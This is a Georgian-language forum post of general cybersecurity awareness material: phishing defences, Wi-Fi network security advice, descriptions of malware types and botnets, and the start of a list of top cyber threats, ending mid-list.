Jump to content
×
×
  • Create New...

კიბერუსაფრთხოება

Moor

Moor
in ზოგადი დისკუსიები

 Share

Recommended Posts

  • ფორუმელი
Moor

Moor

Posted
Posted

აქ ვისაუბროთ, კიბერდანაშაულის ძირითად სახეობებზე და თავდაცვის მექანიზმებზე, პლს.

მაგ, როგორ ხდება სესიის მოპარვა და როგორ უნდა დაიცვას თავი მომხმარებელმა :smoking:

 

ზოგადი ინფო დასაწყისითვის :

კიბერ დანაშაულს წარმოადგენს ნებისმიერი მართლსაწინააღმდეგო ქმედება, რომელიც ჩადენილია კომპიუტერული სისტემის გამოყენებით კიბერსივრცეში. 21–ე საუკუნეში სწრაფი ტექნოლოგიური პროგრესის პარალელურად, კიბერ რისკების რაოდენობა მნიშვნელოვნად მატულობს. თანამედროვე პერიოდში კიბერდანაშაულის საკმაოდ გავრცელებულ შემთხვევებია: ონლაინ თაღლითობა, კომპიუტერულ სისტემასთან უნებართვო წვდომა, ბავშვთა ონლაინ პორნოგრაფია, კომპიუტერული სისტემისა და მონაცემის უნებართვოდ გამოყენება და ა.შ.

 

ინსტრუქციები

კიბერ დანაშაულის მზარდი სტატისტიკა ძირითადად განპირობებულია კიბერ საკითხებზე საზოგადოების დაბალი ცნობიერებით. კიბერ დამნაშავეები ძირითადად იყენებენ ფიშინგის, სპამის მეთოდებსა და სხვადასხვა მავნე პროგრამებს. აღნიშნულიდან გამომდინარე სსიპ – მონაცემთა გაცვლის სააგენტომ შეიმუშავა ზოგადი ინსტრუქციები, რომელებიც წარმოადგენს პრაქტიკული წესების ერთობლიობას ინტერნეტ რესურსებით უსაფრთხო სარგებლობის შესახებ.

 

SPAM-სპამი  

Spoiler

 

PHISHING-ფიშინგი 

Spoiler

რა არის ფიშინგი?

ფიშინგი არის კიბერთაღლითობის გავრცელებული ფორმა, რომლის მიზანია მსხვერპლს მოტყუების გზით მოპაროს სენსიტიური ინფორმაცია ან მოახდინოს კომპიუტერის კომპრომეტაცია. შეტევის დროს გამოიყენება მეილი, რომელიც იგზავნება კიბერ-კრიმინალების მიერ. ძირითადად, მეილი წარმოჩენილია როგორც სანდო წყაროსგან მიღებული შეტყობინება, როგორიცაა ბანკი ან ნებისმიერი სხვა ორგანიზაცია თუ პირი ვისთანაც მსხვერპლს შესაძლოა ქონდეს ურთიერთობა. მეილი შენიღბულია როგორც სასწრაფო შეტყობინება, რომელშიც დამატებითი ინფორმაციისთვის მოთავსებულია ვებ-ბმუმლები ან მიმაგრებული დოკუმენტები. ფიშინგ მეილში მოთავსებულ ბმულზე გადასვლის, ან ფაილის გახსნის შედეგად შესაძლებელია მოხდეს მსხვერპლის კომპიუტერში შეღწევა ან მისგან დამატებით სენსიტიური ინფორმაციის მოთხოვნა (პაროლი, მომხმარებლის სახელი, ბარათის ინფორმაცია და სხვა). კიბერ-დამნაშავეები ცდილობენ ფიშინგ მეილები დააგზავნონ მასიურად, მაქსიმალურად მეტ ადრესატთან, რაც მათი წარმატების ალბათობას რეალურს ხდის.

როგორ დავიცვათ თავი ფიშინგისგან?

პირველ რიგში უნდა გავიაზროთ, რომ გარკვეულ დროს შეიძლება ნებისმიერი ჩვენგანი გახდეს ფიშინგის მსხვერპლი. ფიშინგ შეტევის წარმატების ალბათობა უფრო მაღალია, როდესაც მსხვერპლზე არსებობს პირადი ინფორმაცია (სად მუშაობს, რომელი ბანკის მომხმარებელია, რომელ მაღაზიებში დადის, სად ცხოვრობს, ინტერესის სფერო და სხვა). მას შემდეგ რაც გაათვითცნობიერებთ, რომ ნებისმიერ მომენტში შეიძლება თქვენც აღმოჩნდეთ შეტევის მსხვერპლი, მნიშვნელოვანია იცოდეთ ფიშინგისგან დაცვის საშუალებები:

  • მაქსიმალურად შეზღუდეთ ინფორმაციის (რომელმაც თქვენს შესახებ შესაძლებელია დამატებითი დეტალები მიაწოდოს უცხო პირს) გაზიარება სოციალურ ქსელში, Facebook-ზე, ფორუმებზე და სხვა ინტერნეტ რესურსებზე. რაც უფრო მეტ პერსონალური ტიპის ინფორმაცია იქნება ხელმისაწვდომი საჯაროდ თქვენზე, მით უფრო გაუადვილდება კიბერ-დამნაშავეს თქვენი მახეში გაბმა.
  • თუ მიიღებთ მეილს, რომელიც გთხოვთ რომ გადახვიდეთ ვებ-ბმულზე ან გახსნათ მიმაგრებული დოკუმენტი, გადაამოწმეთ შეტყობინება. თუ მეილი წარმოჩენილია როგორც ნაცნობი ორგანიზაციისგან ან პირისგან გამოგზავნილი, გადაამოწმეთ შესაბამისი ორგანიზაციის ან პირის საკონტაქტო დეტალები, რომელიც თქვენთვის არის ცნობილი.
  • აუცილებლად გამოიყენეთ ანტივირუსი
  • არ დააკლიკოთ ბმულს, დააკოპირეთ ის და ისე გადაიტანეთ მეილიდან ვებ-ბრაუზერში
  • მიიტანეთ მაუსი ბმულთან, სადაც გამოჩნდება ბმულის რეალური მისამართი
  • თუ წერილი გამოგზავნილია ნაცნობი ადამიანისგან, ეს იმას არ ნიშნავს რომ ის არ იქნება საფრთხის შემცველი. შესაძლებელია თქვენი ნაცნობის კომპიუტერი დაინფიცირებული იყოს, რომელიც აგზანიდეს საფრთხის შემცველ წერილებს
  • დაეჭვდი! როდესაც მეილში გთხოვენ სასწრაფო/გადაუდებელ ქმედებებს
  • დაეჭვდი! თუ წერილის შინაარსი დაუჯერებლად საინტერესოა, რომ
  • ინტერნეტით სარგებლობის დროს, ყოველთვის დაიცავით პრინციპით შევჩერდი, დავფიქრდი, ვიმოქმედე.
 
 

სახლის უკაბელო ინტერნეტ ქსელის უსაფრთხოება

Spoiler

სადენიანი (Wired) და უსადენო (Wireless) ქსელების არჩევანი კომპანიაში

1111111111111.jpg

კომპანიები მუდმივად დგებიან არჩევანის წინაშე: გამოიყენონ სადენიანი (wired) ან უსადენო (wireless –WiFi) ქსელები. ასეთ დროს, ხშირად ჩნდება კითხვა: „არის თუ არა უსადენო ქსელი ისეთივე უსაფრთხო როგორც სადენიანი?“

უსაფრთხოების თვალსაზრისით, ამ კითხვაზე ცალსახა პასუხი არასწორი იქნებოდა – სადენიანი ქსელი უფრო დაცულია, მაგრამ WiFi-ს გამოყენება ზოგჯერ მეტად მოსახერხებელია. ამდენად, ორივე მათგანს გააჩნია გარკვეული უპირატესობა. მთავარი შეკითხვა რომელსაც კომპანიებმა უნდა გასცენ პასუხი, არის: „რა უფრო მნიშვნელოვანია ბიზნესისთვის – მაქსიმალური უსაფრთხოება თუ მოქნილობა?“

იმის მიხედვით, თუ ინფორმაციული უსაფრთხოების რისკების როგორი ტოლერანტულობა აქვს კომპანიას ან მის ცალკეულ სუბიექტს, დგინდება უსაფრთხოებასა და მოქნილობას შორის სასწორის გადახრის საკითხი. სწორედ ამიტომ, კომპანიის ერთ ფილიალში, მაგალითად ბანკში, შეიძლება უსაფრთხოების მეტი მოთხოვნა იყოს და არჩევანი მხოლოდ სადენიანი ინტერნეტ ქსელზე გაკეთდეს, მაშინ როდესაც ცალკე არსებული მენეჯერული ოფისისთვის უსადენო ქსელის გამოყენება უფრო მომგებიანი აღმოჩნდეს, განსაკუთხებით მაშინ, როდესაც საქმეში ლეპტოპების გამოყენება ერთვება.

ბუნებრივია, იქ სადაც სადენიანი და უსადენო ქსელების გამოყენება პარალელურად ხდება, ისინი ერთმანეთისგან სრულიად განცალკევებულად უნდა არსებობდნენ. წინააღმდეგ შემთხვევაში, სადენიანი ქსელის უსაფრთხოება ისეთივე დაუცველი აღმოცნდება, როგორიც უსადენო ქსელისა.

ჩვენ აქ განვიხილავთ უსადენო ინტერნეტ ქსელის უსაფრთხოების საკითხს და გაკვრით wired ქსელსაც შევეხებით.

უსადენო ქსელის უსაფრთხოების კომპონენტები

33333333333-1024x683.jpg

უსადენო ქსელი იმდენად დაცულია, რამდენადაც უსაფრთხოა ქსელული მოწყობილობები და კომპიუტერები, ამასთან გათვითცნობიერებულია ამ ქსელში ჩართული ყველა მომხმარებელი. აქ საუბარი არ არის თუ რომელი უფრო მეტად მნიშვნელოვანია – საერთო ჯამში ზემოთქმული სამივე კომპონენტი ადგენს უსადენო ქსელის დაცულობის დონეს.

უსადენო ქსელის უსაფრთხოების პირველი კომპონენტია ქსელური მოწყობილობების დაცულობა. ბუნებრივია, დაუცველი და სისუსტეების შემცველი როუტერი მთლიან ქსელს უქმნის საფრთხეს, მიუხედავად იმისა, რომ ქსელის ადინისტრატორს და IT პერსონალს ექსპერტის დონე გააჩნია. ამასთან, ფაიერვოლის არსებობა საშუალებას იძლევა მაქსიმალურად გაკონტროლდეს ტრაფიკი. ახალი თაობის (NGFW) ფაიერვოლები, სხვა ფუნქციებსაც მოიცავენ, რაც სწორად გამოყენების შემთხვევაში მნიშვნელოვან უპირატესობას აძლევს კომპანიას. ამ ფუნქციებზე აქ არ შევჩერდებით, ამიტომ დაინტერესების შემთხვევაში მიჰყევით ბმულს: –https://en.wikipedia.org/wiki/Next-generation_firewall

ზოგჯერ კომპიუტერებს არ თვლიან ქსელურ უსაფრთხოებაში, მაგრამ პრაქტიკა აჩვენებს, რომ დავირუსებულ კომპიუტერს შეუძლია მთელი ქსელის პარალიზება მოახდინოს და ამის არაერთი პრაქტიკული, მრავლმილიონიანი ზარალის მომტანი მაგალითი არსებობს.

მესამე კომპონენტი – მომხმარებლები – გათვითცნობიერებულები უნდა იყვნენ და იცოდნენ, როგორ გამოიყენონ კომპანიის WiFi ქსელი. ამისთვის აუცილებელია Awareness ტრენინგების ჩატარება. ბოლო თაობის ფაიერვოლი და როუტერიც ვერ დაიცავს ქსელს, თუ ქსელის მომხმარებელი პაროლს ვინმე უცხო პირს გაუზიარებს.

უსადენო ქსელის უსაფრთხოების მთვარი გამოწვევები

უსადენო ქსელის ძირითადი შიდა და გარე გამოწვევები მოიცავს შემდეგს:

  • უცხო პირები რომლებიც უსადენო ქსელის „გატეხვას“ ცდილობენ:
    • Brute-Force შეტევა პაროლის ამოსაცნობად როგორც მოწყობილობაზე ისე WiFi-ზე
    • შიფრაციის სისუსტეების გამოყენება
    • მოწყობილობის სისუსტეების გამოყენება
    • არასწორი კონფიგურაცია
    • ფიშინგ შეტევა (მაგალითად, ზარი საფორთთან ასეთი შინაარსის ტექსტით, საკონფერენციო ოთახში ვარ და პაროლი დამავიწყდა. შემახსენეთ პაროლი თუ შეიძლება)
  • სტუმარი, რომელსაც WiFi სჭირდება
  • კომპანიის თანამშრომლები:
    • ფიშინგ შეტევის ვერ გამოცნობა და მონაცემების გაცემა
    • დავირუსებული ბარათების შეერთება კომპიუტერში და ვირუსების ქსელში გავრცელება
    • მიღებული „ლეგიტიმური“, რეალურად ვირუსული ფაილების გახსნა
    • ქსელში ჩართული მოწყობილობის ღიად დატოვება
    • ქსელთან დაკავშირებული პორტატული (მობილური, ლეპტოპი) მოწყობილობის დაკარგვა

ქსელის დაცვა

2222222222-1024x576.jpg

სადენიანი ქსელი ფიზიკურად უნდა იყოს დაცული. სადენიანი ქსელის უპირატესობა სწორედ ის არის, რომ მასზე წვდომის მოპოვება მხოლოდ ფიზიკურად დაკავშირებით შეიძლება (ბუნებრივია ვირუსი თუ გახსნა ვინმემ, ეს სულ სხვა შემთხევა იქნება). საეჭვო ადგილებში რეკომენდებულია კამერების გამოყენება.

კომპანიას უნდა გააჩნდეს მინიმუმ ორი უსადენო ქსელი: ერთი თანამშრომლებისთვის, მეორე – სტუმრებისთვის. ზოგ შემთხვევაში, უსაფრთხოების მოტივით კომპანიები ქმნიან რამდენიმე ცალკეულ უსადენო ქსელს, სადაც თითოეულ ქსელზე წვდომა აქვთ მხოლოდ შესაბამისი საჭიროებების მქონე თანამშრომლებს, ან სტუმრებს.

თანამედროვე წვდომის წერტილებს (Access Point – AP) გააჩნიათ ე.წ.
rogue AP-ების აღმოჩენის, დაბლოკვისა და გათიშვის საშუალება. მათ შეუძლიათ აღმოაჩინონ ლეგიტიმური უსადენო ქსელის იდენტური სახელის მქონე ჰაკერის მიერ ჩართული არალეგიტიმური Wi-Fi და დაბლოკონ ის. რეკომენდებულია ძველი AP-ების განახლება ახალი წვდომის წერტილებით და ამ ფუნქციონალის გააქტიურება.

ქსელს უნდა იცავდეს თანამედროვე შესაძლებლობების მქონე ფაიერვოლი, ქსელური მოწყობილობები და კომპიუტერები დაცული იყოს, თანამშრომლები კი – ინფორმირებულნი. უფრო დეტალურად:

  • ქსელური მოწყობილობები ფიზიკურად უნდა იყვნენ დაცული (განთავსდეს რთულად ხელმისაწვდომ ადგილზე, უყურებდეს კამერა, ან/და ჩაკეტილი იყოს სპეციალურ ყუთში)
  • ქსელურ მოწყობილობებს უნდა გააჩნდეთ ძლიერი პაროლი, რომელიც იცვლება გარკვეული პერიოდულობით. არავითარ შემთხვევაში არცერთ მოწყობილობაზე default პაროლის გამოყენება არ შეიძლება
  • წვდომის წერტილები (Access Points) ისე უნდა იყოს განაწილებული, რომ ტალღების გავრცელება ოფისის გარეთ მინიმალურ მანძილზე ხდებოდეს, საჭიროების შემთხვევაში, ეს მაძილი შეიძლება დარეგულირდეს თავად მოწყობილობიდან
  • WiFi იმდენად არის დაცული, რამდენადაც ძლიერია მისი შიფრაცია, პაროლი კი – გრძელი. ამიტომ WiFi-ს უნდა ჰქონდეს 10 ან მეტი სიმბოლოსგან შემდგარი რთული პაროლი, რომელიც დაცულია WPA2 (ან თუ მხარდაჭერა აქვს უახლესი WPA3) პროტოკოლით
  • გარედან კავშირის დროს, საჭიროა კომპანიის კუთვნილი, ან მის მიერ დაშვებული მომწოდებლის VPN-ს გამოყენება.
  • ქსელურ მოწყობილობებზე განახლებები და პატჩები უნდა დაყენდეს დროულად. ამის შეუძლებლობის შემთხვევაში კი ახლით შეიცვალოს თავად მოწყობილობა.
  • მნიშვნელოვანია ინფორმაციული უსაფრთხოების აუდიტის და შეღწევადობის ტესტის ჩატარებაც წელიწადში ერთხელ მაინც
  • კომპიუტერები დაცული უნდა იყოს კომპანიის მიერ ოფიციალურად შეძენილი ანტივირუსით
  • თანამშრომლებს უნდა უტარდებოდეთ ტრენინგები გარკვეული პერიოდულობით, როგორც ფიშინგზე, ისე მათ წილ პასუხისმგებლობაზე ქსელის უსაფრთხოების უზრუნველყოფისთვის
  • მიუხედავად იმისა, რომ დიდ ადამიანურ რესურსებს მოითხოვს, რეკომენდებულია მოწყობილობების ფილტრაცია MAC ისამართის მეშვეობით ე.წ. White List-ის შექმნა და ყველა სხვა მოწყობილობისთვის ქსელთან დაკავშირების აკრძალვა.

ბოლოთქმა

იმისთვის, რომ მენეჯმენტმა გადაწყვიტოს უსადენო ქსელი გამოიყენოს თუ სადენიანი, მან ყველა შესაძლო გამოწვევა უნდა გაიაზროს. მიღებულია, რომ ფინანსურ ორგანიზაციებში უსაფრთხოების მაღალი დონის მოთხოვნებიდან გამომდინარე, უპირატესობა სადენიან ქსელებს ენიჭება. უსადენო ქსელები კი დამხმარე სახით,  განცალკევებულად გამოიყენება, ისე რომ უსადენო ქსელიდან სადენიან ქსელზე ინფორმაციის მიმოცვლა შეუძლებელი იყოს.

ქსელის დაუცველობა მნიშვნელოვან საფრთხეებს ქმნის და რაც უფრო წინ მიდის მსოფლიოს ტექნოლოგიური განვითარება, მით მეტად იზრდება ფინანსური რისკები კომპანიებისთვის. ახლა საჭირო არ არის, ქსელში შეღწევამ კომპანიის მუშაობის პარალიზება გამოიწვიოს. სრულიად საკმარისია ამ ქმედებას მომხმარებელთა პერსონალური მონაცემების გაჟონვა მოჰყვეს, რომ კომპანიას მილიონობით ზარალი მიადგეს არამხოლოდ რეგულაციებისა და სასამართლოში წაგებული საქმეების, არამედ რეპუტაციის დაკარგვითაც. ცნობილია, რომ გახმაურებული ჰაკერული შეტევის შემდეგ, კომპანიები მომხმარებელთა დაახლოებით 1/3-ს კარგავენ, თუმცა ეს უკვე სხვა თემაა, და მას მოგვიანებით გაგაცნობთ.

 

MALWARE- ზიანის მომტანი პროგრამა 

Spoiler

მავნე პროგრამა, საზიანო პროგრამა (ინგლ. Malware) — ყველა იმ პროგრამის სახელწოდება, რომელიც ცდილობს მოიპოვოს უკანონი და არა სანქცირებული გზების საშუალებით წვდომა მსხვერპლის კომპიუტერზე ან პროგრამა, რომელიც მიზანმიმართულად არის შექმნილი იმისათვის, რომ ავნოს მომხმარებლის კომპიუტერს ან მასში არსებულ ინფორმაციას, მოხმარებლისგან მალულად, ასეთ პროგრამებს ხშირად ვირუსებს ეძახიან, ისინი იყოფიან რამდენიმე კლასებად და სახეობებად, მაგ: ტროის ცხენი, ბექდორი, კილოგერი და ა.შ. ყველაზე გავრცელებულ ფორმას წარმოადგენს ტროას ვირუსი, ხოლო ბექდორი კი ყველაზე საშიშ კატეგორიას მიეკუთვნება, სხვადასხვა ოპერაციულ სისტემებს სხვადასხვა სახის ვირუსების შექმნის საშუალებები არსებობს.

სიმპტომები[რედაქტირება | წყაროს რედაქტირება]

პროგრამა შეიძლება ჩაითვალოს მავნედ თუ მას ახასიათებს შემდეგი აქტივობებიდან ერთ-ერთი მაინც:

  • კოპირდება ქსელში ან ფაილურ სისტემაში, მომხმარებლის თანხმობის გარეშე
  • დისტანციურად არაავტორიზირებულ პიროვნებას აძლევს სისტემის კონტროლის საშუალებას
  • აგზავნის ინფორმაციას სისტემიდან მომხმარებლის თანხმობის და გათვითცნობიერების გარეშე
  • აგზავნის სისტემაში ინფორმაცას, ფუნციონირების მოშლის მიზნით
  • ხსნის პორტებს და იწყებს მათზე მიყურადებას რომლის მეშვეობითაც მართვის ცენტრიდან მიიღებს ბრძანებებს
  • იწერს კლავიატურაზე აკრეფილ სიმბოლოებს და აგზავნის მას
  • უკავშირდება საეჭვო სერვერებს
  • ქაჩავს და უშვებს საეჭვო ფაილებს საეჭვო სერვერებიდან
  • აკოპირებს თავისთავს რამდენიმე ადგილში სხვა ლეგიტიმურ პროგრამაში ახდენს კოდის ინექციას
  • ახდენს სისტემაში არა ავტორიზირებულ ცვლილებებს
  • ახდენს რეგისტრების ცვლილებას, და სტარტაპში პროგრამების თვითნებურად ჩასმას

მალვეარის ტიპები[რედაქტირება | წყაროს რედაქტირება]

ჩვეულებრივი ვირუსი[რედაქტირება | წყაროს რედაქტირება]

ჩვეულებრივი ვირუსს ძალუძს კომპიუტერის მუშაობის მოდიფიკაცია, მრავლდება თავისით, სჭრიდება პროგრამა, რომელზეც მიმაგრდება.

„ვორმი“[რედაქტირება | წყაროს რედაქტირება]

worm („ვორმი“, ჭიაყელა) ჩვეულერივი ვირუსისაგან იმით განსხვავდება, რომ არ სჭირდება ჰოსტ პროგრამა, ის არის „თვით ტირაჟირებადი“ ანუ მისი გახსნა არაა აუცილებელი გააქტიურებისთვის. ვირუსი ვრცელდება ქსელის ან ინფორმაციის შენახვის გარე მოწყობილობის მეშვეობით;

 

ტროას ცხენი[რედაქტირება | წყაროს რედაქტირება]

Trojan Horse (ტროას ცხენი) – პროგრამა, რომელიც ირწმუნება, რომ გააკეთებს ერთს და სინამდვილეში აკეთებს მეორეს. ქმნის უკანა კარებს, რომელიც ჰაკერს საშუალებას აძლევს წვდომა ჰქონდეს მსხვერპლის კომპიუტერის სისტემასთან.

სპაივეარი[რედაქტირება | წყაროს რედაქტირება]

სპაივეარი არის პროგრამა რომელიც ფარულად აგროვებს პერსონალურ და სენსიტიურ ინფორმაციას მსხვერპლის კომპიუტერიდან და აგზავნის მას ფარულად. ის მოიცავს ასევე მსხვერპლის სისტემის მონიტორინგს, ინფორმაციის შეგროვებას როგორიცაა: პაროლები, საკრედიტო ინფორმაცია, ვებ გვერდები და მათი კონტენტი, და სხვა პირადი ინფორმაცია.

ედვეარი[რედაქტირება | წყაროს რედაქტირება]

ედვეარი არის პროგრამა რომელიც ახდენს არალეგალურ რეკლამების მიწოდებას მომხმარებლისთვის მის ინტერნეტ ქცევაზე დაკვირვებით. შეიძლება იყოს მიზანიმართული რეკლამების მიწოდება, რაც ითვალისწინებს სხვა ტიპის მავნე პროგრამებს გადმოწერას.

რუტკიტი[რედაქტირება | წყაროს რედაქტირება]

რუტკიტი არის მავნე პროგრამა, ტროიანი, ბექდორი ან სხვა რომელიც იმდაგვარად ცვლის ოპერატიული სისტემის ფუნქციონალს რომ მისი აღმოჩენა ძალზედ რთულია. პრივილეგირებული წვდომა აქვს კომპიუტერთან.

Spam (სპამი)[რედაქტირება | წყაროს რედაქტირება]

ეს არის ტერმინი, რომელიც გამოიყენება გაუხმაურებელი კომერციული email-ის მიმართ. ამ ტიპის e-mail-ი მასიური ხასიათისაა და ხდება პროდუქტების ან სერვისების ყიდვის შეთავაზება. სპამერი (მომხმარებელი, რომელიც აგზავნის სპამს) მომხმარებლების e-mail მისამართებს ებულობს მათ მიერ გარკვეულ web-გვერდებზე შესვლის ან კომენტარების დატოვების შედეგად

Logic bomb (ლოგიკური ბომბი)[რედაქტირება | წყაროს რედაქტირება]

არის ვირუსის ტიპი, რომელიც ელოდება სისტემაში გარკვეული მოვლენის დადგომას და მხოლოდ ამის შემდეგ გააქტიურდება. ის შეიძლება იყოს პროგრამული უზრუნველყოფის ნაწილი, რომელიც გარკვეული თარიღის დადგომის შემდეგ იქცევა ზიანის შემცველ პროგრამად;

რანსომვეარი[რედაქტირება | წყაროს რედაქტირება]

მავნე პროგრამა რომელსაც მძევლად აყავს ჩვენი სისტემა, მისი გამოწერის და დაყენების შემდეგ, ის ახდენს სისტემის შიფრაციას კრიპტოგრაფიული მეთოდების გამოყენებით. ამის შემდეგ პროგრამა გვთხოვს ფულს თუ გვინდა რომ კრიპტოგრაფიული გასაღები მივიღოთ და გავშიფროთ ჩვენი სისტემა.

ბოტნეტი[რედაქტირება | წყაროს რედაქტირება]

Botnet - აგრეთვე ცნობილი როგორც ზომბების არმია, წარმოადგენს ვირუსის ერთ-ერთ ძლიერ სახეს, რომლის მფლობელს ან/და ავტორს აქვს საშუალება განახორციელოს სხვადასხვა კიბერშეტევა, მოიპაროს ინფორმაცია, ეძლევა საშუალება რომ დაუკავშირდეს დაზომბირებულ კომპიუტერს და სრულიად აკონტროლოს ის

ზიანის შემცვლელი პროგრამები[რედაქტირება | წყაროს რედაქტირება]

ლიტერატურა[რედაქტირება | წყაროს რედაქტირება]

  • Malware: Fighting Malicious Code. Ed Skoudis. Lenny Zeltser.
 

BOTNET-ბოტნეტი

Spoiler

ბოტნეტი  კომპიუტერების ჯგუფი, რომელიც იმართება ერთი ან რამდენიმე ადამიანისგან. ბოტნეტი უმეტესად იმართება IRC-იდან (Internet Relay Chat), მაგრამ მისი მართვა შესაძლებელია საიტიდანაც. ბოტნეტის სამართავად საჭიროა ერთი ბოტი, რომლის შოვნაც არც ისე ძნელია; თვითონ ბოტნეტის შემქმნელსაც კი შეუძლია აირჩიოს ბოტი. ბევრი ბოტი არსებობს და ყველას განსხვავებული ფუნქციები აქვთ, ბოტნეტის შემქმნელი იმ ბოტს ირჩევს, რომელსაც უფრო მეტი ფუნქცია აქვს და რომელიც უფრო მარტივი სამართავია. იმისათვის, რომ უფრო მძლავრი ბოტნეტი იყოს ბოტის გავრცელებაა საჭირო, რაც უფრო გავრცელებულია და რაც უფრო მეტი კომპიუტერია დაზომბირებული მით უფრო მძლავრია ბოტნეტი. ბოტნეტის მეშვეობით უამრავი რამ არის შესაძლებელი, მაგალითად: ინტერნეტის გათიშვა, სერვერის გათიშვა, ქსელის ბარათის გადაწვა და სხვა. ამისათვის იყენებენ DDoS (Distributed Denial of Services)-ს. უმეტესად ბოტნეტს იმიტომ აწყობენ რომ მოაწყონ DDoS — შეტევები. ბოტები უმეტესად იწერება C++ და C-ში. იმისთვის, რომ ბოტი გავრცელდეს საჭიროა ამ ბოტის დაკომპილირება, რისთვისაც იყენებენ Microsoft Visual C++ ან LCC-Win 32-ს.

 

ელექტრონული ფოსტა და უსაფრთხოება

Spoiler

 

 

რეკომენდაციები

rec

http://police.ge/files/cover/projects/recomendation2.png

 

ტოპ 10 კიბერდანაშაული შარშანდელი მონაცემებით 

Spoiler

2019 წლის 10 ყველაზე აქტუალური კიბერუსაფრთხოების საკითხი

1-2-1024x532.jpg

კიბერ უსაფრთხოება ჩვენი პირადი და პროფესიული ცხოვრების ყოველდღიური საზრუნავია. როდესაც ინტერნეტში შედიხართ მეგობრებთან ან კოლეგებთან სასაუბროდ ან რამის საყიდლად, გიწევთ ნერვიულობა იმაზე, თუ ვინ შეიძლება გადევნებდეთ თვალყურს თქვენ ან თქვენს ფაილებსა და მონაცემებს. თუმცა, კიბერდანაშაული მხოლოდ ინდივიდუალური შეშფოთების საგანი არაა. 

უკანასკნელ პერიოდში, დიდმა საინფორმაციო ორგანიზაციებმა განაცხადეს, რომ კიბერ უსაფრთხოება ყველაზე დიდი საფრთხე იყო მსოფლიო ეკონომიკისთვის. მონაცემთა გაჟონვასთან დაკავშირებით, ბოლო რამდენიმე წლის ჩანაწერებიდან ჩანს, რომ სულ უფრო ძნელი ხდება ახალი ვირუსების ამოცნობა. გასაკვირი არაა, რომ საინფორმაციო, სამთავრობო სააგენტოების და კიბერუსაფრთხოების სპეციალისტები განგაშს ტეხენ ყოველივე ამაზე.

კიბერ უსაფრთხოების გლობალური სტატისტიკა

დღევანდელ დრომდე, 2019 წელმა მოგვიტანა ძალიან ბევრი კიბერ-ინციდენტი, და ასევე, პროგნოზიც, რომ 2020 წელი და მისი მომდევნო პერიოდი კიდევ უფრო არასაიმედო იქნება უსაფრთხოების ჭრილში. მიუხედავად იმისა, რომ კიბერუსაფრთხოების დაზღვევის ხარჯები 2022 წლისთვის 14 მილიარდ აშშ დოლარამდე გაიზრდება, ახლანდელი მონაცემებით, საწარმოთა 80%-ს კვლავ არ აქვს კიბერუსაფრთხოების პრევენციული ყოვლისმომცველი გეგმა.

კიდევ ერთი ტრენდული  საფრთხეა საკუთარი მოწყობილობის ტარების (BYOD) ზრდა. დადგენილია, რომ დამსაქმებელთა 59% საშუალებას აძლევს თანამშრომლებს სამსახურის საქმეები განახორციელონ პირად სმარტფონებზე, ტაბლეტებსა თუ ლეპტოპებზე. პერსონალისთვის სახლიდან მუშაობის ან საკუთარი მოწყობილობების გამოყენების ნებართვა ბიზნესის მფლობელებისთვის მოსახერხებელი და ეფექტურია, თუმცა ის ასევე მოწყვლადს ხდის კომპანიებს სოციალური ინჟინერიის ექსპლოიტებისა და გამომძალველი ვირუსების შეტევების გამო.

გლობალურად, ერთ-ერთი ყველაზე მოწყვლადი სექტორია ჯანდაცვა, მეორე ადგილზეა წარმოება, ხოლო მესამეზე – საბანკო/საფინანსო ინდუსტრია.

რაც შეეხება შეტევებსა და ექსპლოიტებს, ისინი უფრო დახვეწილი და ძნელად აღმოსაჩენი ხდება. ყოველ 39 წამში ჰაკერების ახალი შეტევა ხორციელდება, და ნახევარზე მეტი მათგანი მიმართულია მცირე ბიზნესისკენ. მხოლოდ გასული წელი რომ ავიღოთ, ნახევარ მილიარდზე მეტი პერსონალური მონაცემის ჩანაწერი მოიპარეს კიბერ კრიმინალებმა. მომავალი წლისთვის მონაცემთა გაჟონვის საშუალო ღირებულება 150 მილიონ აშშ დოლარს მიაღწევს.

რა არის ყველაზე დიდი საფრთხე ჩვენი ციფრული უსაფრთხოებისთვის? წარმოგიდგენთ კიბერ უსაფრთხოების 10 ყველაზე აქტუალურ საკითხს.

  1. ფინანსური დანაშაული

მიუხედავად იმისა, რომ ბევრი დანაშაულის მიღმა ფინანსური მოტივი დგას, არსებობს სპეციფიკური და დამანგრეველი კომპიუტერზე დაფუძნებული დანაშაულები, რომელთა სიხშირე და სიმძიმე საგრძნობლად იზრდება. გამომძალველმა ვირუსებმა (Ransomware) განსაკუთრებული ყურადღება მიიქცია ბოლო რამდენიმე წელია, თუმცა კრიპტოვალუტებთან ასოცირებული სხვა დანაშაულები კიდევ უფრო დიდ პრობლემას წარმოადგენენ.

მომხმარებლების ინტერნეტში ყოფნისას, კრიპტომაინერი პროგრამები მუშაობენ ფაქტობრივად შეუმჩნევლად და უშეცდომოდ ფონურად მიმდინარე პროცესებში. კოდის გააქტიურება შესაძლოა მოხდეს იმეილზე თანდართული ფაილის საშუალებით, რომელსაც ტრადიციულად თან ახლავს ვირუსები ან გამომძალველი პროგრამები. ისინი არ იყენებენ თქვენს ფულს, არამედ მომუშავე მოწყობილობების ძალასა და რესურსებს.

Ransomware არის საფრთხე, რომელსაც არანაირი გაფრთხილება არ აქვს იქამდე, სანამ დაიბლოკებით ქსელიდან ან ადმინ-პანელიდან. ასეთ შემთხვევაში, ერთადერთი გამოსავალი არის სისტემის აღდგენა (back-up) ან თანხის გადახდა. ამასთან, იმდენად დაბალია შანსი, რომ კვლავ მოიპოვოთ წვდომა საკუთარ სისტემაზე/მონაცემებზე, FBI ურჩევს დაზარალებულებს არ გადაუხადონ თანხა თავდამსხმელებს.

  1. მრავალ-ღრუბლოვანი გამოთვლები

ვირტუალურ სამყაროში არსებული კიდევ უფრო მეტი პლატფორმითა და მომსახურებით, მრავალ-ღრუბლოვანი და დისტანციური გამოთვლები მომავლის სამუშაო გარემოა. ამასთან, გლობალური, საზღვრების გარეშე არსებული საზოგადოება და ღრუბელზე დაფუძნებული გადაწყვეტილებები გულისხმობს ფართო სახის შეტევებს, რომელიც მოითხოვს უფრო მეტ დაცვას ე.წ. endpoint მოწყობილობებზე. 

  1. მესამე მხარის და მიმწოდებელი ჯაჭვის შეტევების ზრდა

